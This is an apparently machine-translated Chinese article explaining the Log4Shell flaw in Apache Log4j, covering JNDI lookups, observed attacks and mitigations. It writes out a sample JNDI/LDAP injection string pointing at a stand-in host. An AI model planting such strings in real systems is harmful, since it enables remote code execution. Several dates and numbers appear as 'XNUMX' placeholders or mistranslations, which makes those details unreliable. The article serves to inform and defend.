目錄[隱藏][顯示]
2021 年 XNUMX 月下旬,我們發現了對網絡安全的重大威脅。 此漏洞可能會影響全球數百萬個計算機系統。
這是有關 Log4j 漏洞的指南,以及一個被忽視的設計缺陷如何使全球 90% 以上的計算機服務受到攻擊。
Apache Log4j 是由 Apache Software Foundation 開發的基於 Java 的開源日誌記錄實用程序。 它最初由 Ceki Gülcü 於 2001 年編寫,現在是 Apache 軟件基金會項目 Apache Logging Services 的一部分。
世界各地的公司都使用 Log4j 庫來啟用對其應用程序的日誌記錄。 事實上,Java 庫無處不在,您可以在來自 Amazon、Microsoft、Google 等的應用程序中找到它。
該庫的突出地位意味著代碼中的任何潛在缺陷都可能使數百萬台計算機面臨黑客攻擊。 24 年 2021 月 XNUMX 日,一個 雲安全 為阿里巴巴工作的研究員發現了一個可怕的缺陷。
Log4j 漏洞,也稱為 Log4Shell,自 2013 年以來一直未被注意到。該漏洞允許惡意行為者在運行 Log4j 的受影響系統上運行代碼。 9年2021月XNUMX日公開披露
行業專家稱 Log4Shell 缺陷為 最近記憶中最大的漏洞.
在漏洞發布後的一周內,網絡安全團隊檢測到數百萬次攻擊。 一些研究人員甚至觀察到每分鐘攻擊次數超過一百次。
它如何運作?
要了解 Log4Shell 為何如此危險,我們需要了解它的能力。
Log4Shell 漏洞允許執行任意代碼,這基本上意味著攻擊者可以在目標機器上運行任何命令或代碼。
它是如何做到這一點的?
首先,我們需要了解 JNDI 是什麼。
Java 命名和目錄接口 (JNDI) 是一種 Java 服務,它允許 Java 程序通過名稱發現和查找數據和資源。 這些目錄服務很重要,因為它們為開發人員提供了一組有組織的記錄,以便在創建應用程序時輕鬆引用。
JNDI 可以使用各種協議來訪問某個目錄。 這些協議之一是輕量級目錄訪問協議或 LDAP。
記錄字符串時, 日誌4j 當遇到以下形式的表達式時執行字符串替換 ${prefix:name}
.
例如, Text: ${java:version}
可能記錄為文本:Java 版本 1.8.0_65。 這類替換是司空見慣的。
我們還可以有如下表達式 Text: ${jndi:ldap://example.com/file}
它使用 JNDI 系統通過 LDAP 協議從 URL 加載 Java 對象。
這有效地將來自該 URL 的數據加載到機器中。 任何潛在的黑客都可以在公共 URL 上託管惡意代碼,並等待使用 Log4j 的機器記錄它。
由於日誌消息的內容包含用戶控制的數據,黑客可以插入他們自己的 JNDI 引用,這些引用指向他們控制的 LDAP 服務器。 這些 LDAP 服務器可能充滿了 JNDI 可以通過漏洞執行的惡意 Java 對象。
更糟糕的是,應用程序是服務器端應用程序還是客戶端應用程序並不重要。
只要記錄器有辦法讀取攻擊者的惡意代碼,該應用程序仍然可以被利用。
誰受到影響?
該漏洞影響所有使用 APache Log4j 的系統和服務,版本為 2.0 至 2.14.1,包括 XNUMX。
多位安全專家建議,該漏洞可能會影響許多使用 Java 的應用程序。
該漏洞最初是在微軟擁有的 Minecraft 視頻遊戲中發現的。 Microsoft 已敦促其用戶升級其 Java 版 Minecraft 軟件以防止任何風險。
網絡安全和基礎設施安全局 (CISA) 主任 Jen Easterly 表示,供應商擁有 主要責任 以防止最終用戶惡意行為者利用此漏洞。
“供應商還應與客戶溝通,以確保最終用戶知道他們的產品包含此漏洞,並應優先考慮軟件更新。”
據報導,襲擊已經開始。 賽門鐵克是一家提供網絡安全軟件的公司,它觀察到了不同數量的攻擊請求。
以下是研究人員檢測到的攻擊類型的一些示例:
- 殭屍網絡
殭屍網絡是由單個攻擊方控制的計算機網絡。 它們幫助執行 DDoS 攻擊、竊取數據和其他詐騙。 研究人員在從 Log4j 漏洞下載的 shell 腳本中觀察到 Muhstik 殭屍網絡。
- XMRig 礦工木馬
XMRig 是一個使用 CPU 來挖掘門羅幣的開源加密貨幣礦工。 網絡犯罪分子可以在人們的設備上安裝 XMRig,這樣他們就可以在他們不知情的情況下使用他們的處理能力。
- Khonsari 勒索軟件
勒索軟件是指一種惡意軟件,旨在 加密文件 在電腦上。 然後,攻擊者可以要求付款以換取對加密文件的訪問權。 研究人員在 Log4Shell 攻擊中發現了 Khonsari 勒索軟件。 它們以 Windows 服務器為目標並利用 .NET 框架。
接下來會發生什麼呢?
專家預測,完全修復 Log4J 漏洞帶來的混亂可能需要幾個月甚至幾年的時間。
此過程涉及使用修補版本更新每個受影響的系統。 即使對所有這些系統進行了修補,仍然存在迫在眉睫的潛在後門威脅,黑客可能已經將這些後門添加到服務器開放以進行攻擊的窗口中。
許多 解決方案和緩解措施 存在以防止應用程序被此錯誤利用。 新的 Log4j 版本 2.15.0-rc1 更改了各種設置以緩解此漏洞。
默認情況下,所有使用 JNDI 的功能都將被禁用,遠程查找也受到限制。 禁用 Log4j 設置中的查找功能將有助於降低可能被利用的風險。
在 Log4j 之外,仍然需要更廣泛的計劃來防止開源漏洞利用。
XNUMX月初,白宮發布了一份 行政命令 旨在改善國家網絡安全。 它包括軟件材料清單 (SBOM) 的規定,它本質上是一份正式文件,其中包含構建應用程序所需的每個項目的列表。
這包括諸如 開源 用於開發的包、依賴項和 API。 儘管 SBOM 的想法有助於提高透明度,但它真的對消費者有幫助嗎?
升級依賴可能太麻煩了。 公司可以選擇支付任何罰款,而不是冒著浪費額外時間尋找替代方案的風險。 也許這些 SBOM 只有在它們的 示波器 進一步受到限制。
結論
Log4j 問題不僅僅是組織的技術問題。
業務領導者必須意識到當他們的服務器、產品或服務依賴於他們自己不維護的代碼時可能發生的潛在風險。
依賴開源和第三方應用程序總是伴隨著一些風險。 公司應考慮在新威脅出現之前製定風險緩解策略。
大部分網絡都依賴於由全球數千名志願者維護的開源軟件。
如果我們想保持網絡安全,政府和企業應該投資於資助開源工作和網絡安全機構,例如 信息系統.
發表評論